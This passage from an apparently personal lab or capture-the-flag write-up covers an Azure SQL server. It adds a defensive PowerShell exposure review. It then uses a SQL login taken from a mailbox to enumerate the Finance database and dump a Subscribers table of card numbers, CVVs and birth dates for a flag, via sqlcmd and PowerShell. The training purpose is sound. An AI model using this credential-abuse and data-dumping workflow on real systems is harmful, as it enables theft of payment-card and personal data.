"id": "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2/providers/Microsoft.Sql/servers/mbt-finance",
...snip...
"name": "mbt-finance",
...snip...
"type": "Microsoft.Sql/servers",
"version": "12.0",
"workspaceFeature": null
}
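As an added example (not part of the lab or this write-up), the same Azure CLI that listed the server above can be used from PowerShell for a quick exposure review of that server: who can reach it at the network level, whether SQL logins such as financereports are still permitted alongside Entra authentication, and whether auditing and encryption at rest are on. It assumes an `az login` session with Reader rights on the subscription; the resource group and server name are taken from the `az sql server list` output on this page.

```powershell
# Added example (not from the write-up or the lab): review server-level exposure
# of the Azure SQL server found above, using the Azure CLI from PowerShell.
# Assumes `az login` with Reader rights; names come from the az output on this page.
$rg     = "content-static-2"
$server = "mbt-finance"

# Server-level firewall rules. A 0.0.0.0 - 255.255.255.255 range means the public
# endpoint is reachable from any IP; 0.0.0.0 - 0.0.0.0 is the "Azure services" rule.
"Firewall rules:"
$rules = az sql server firewall-rule list -g $rg -s $server | ConvertFrom-Json
foreach ($r in $rules) {
    $open = ($r.startIpAddress -eq "0.0.0.0" -and $r.endIpAddress -eq "255.255.255.255")
    "{0,-30} {1,-16} {2,-16} {3}" -f $r.name, $r.startIpAddress, $r.endIpAddress,
        $(if ($open) { "<- OPEN TO THE INTERNET" } else { "" })
}

# Is Entra-only authentication enforced? If not, SQL logins like 'financereports'
# (a shared password sent by e-mail in this lab) remain a valid way in.
"`nEntra-only authentication:"
az sql server ad-only-auth get -g $rg -n $server

# Server auditing state: without it, the sqlcmd session shown below leaves no trail.
$audit = az sql server audit-policy show -g $rg -n $server | ConvertFrom-Json
"`nAuditing state: $($audit.state)"

# Transparent Data Encryption for each user database on the server.
foreach ($db in (az sql db list -g $rg -s $server | ConvertFrom-Json)) {
    if ($db.name -eq "master") { continue }
    $tde = az sql db tde show -g $rg -s $server -d $db.name | ConvertFrom-Json
    "TDE on $($db.name): $($tde.state)"
}
```

None of these settings would have stopped a valid username and password from being used, but together they decide how far that credential reaches (any IP or a known range), whether it should exist at all (Entra-only), and whether the queries it ran are recorded.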
2.4.1 Accessing Azure SQL database with sqlcmd
../Azure Services/Azure SQL#3.1 sqlcmd
So instead of using the GUI from the lab, I decided to go with sqlcmd!!
Log in with the given information. For no particular reason, I also checked the version of the database.
./sqlcmd -S mbt-finance.database.windows.net -U financereports -d Finance
1> select @@version
2> go
Microsoft SQL Azure (RTM) - 12.0.2000.8
Sep 3 2024 11:34:29
Copyright (C) 2022 Microsoft Corporation
Then get the database information. I see two databases are available.
1> SELECT name FROM sys.databases;
2> go
name
master
Finance
Here I decided to go with Finance. So as we can see, I already have the database name. I still need table and column information.
1> use Finance
2> go
Changed database context to 'Finance'.
1> select table_name from information_schema.Tables
2> go
table_name
database_firewall_rules
Subscribers
1> select column_name from information_schema.columns
2> go
column_name
create_date
end_ip_address
id
modify_date
name
start_ip_address
BirthDate
CardNumber
CVV
ExpiryDate
FullName
SubscriberID
(12 rows affected)
So I identified the needed information and found the flag!
1> select * from Subscribers
2> go
SubscriberID                         CardNumber       ExpiryDate CVV FullName   BirthDate
...snip...
ebb7c066-b630-4794-9d3a-06451a685b65 4532756279624064 2025-12-01 123 Alex Smith 1990-06-15
d4148d1d-f65e-45da-93fe-a47e39fa011b 5399832489200328 2023-11-01 311 Jamie Doe  1982-03-22
or
1> select fullname from Subscribers
2> go
fullname
...snip...
Flag: 82b55974e50db8c02b4119a976c3570b
2.4.2 Accessing Azure SQL database with PowerShell
From the exercise, 4. Loot Exchange, Teams and SharePoint with GraphRunner
# Open a connection with the SQL login found in the mailbox (password redacted here)
$conn = New-Object System.Data.SqlClient.SqlConnection
$password = '*****'
$conn.ConnectionString = "Server=mbt-finance.database.windows.net;Database=Finance;User ID=financereports;Password=$password;"
$conn.Open()
# Build the command; CreateCommand already binds it to $conn
$sqlcmd = $conn.CreateCommand()
$sqlcmd.Connection = $conn
$query = "SELECT * FROM Subscribers;"
$sqlcmd.CommandText = $query
# Pull the result set into a DataSet through a data adapter and print the table(s)
$adp = New-Object System.Data.SqlClient.SqlDataAdapter $sqlcmd
$data = New-Object System.Data.DataSet
$adp.Fill($data) | Out-Null
$data.Tables | Format-Table -AutoSize
# Release the connection back to the pool
$conn.Close()
2.4.3 With VSCODE!
This was something I learned and thought this was really cool.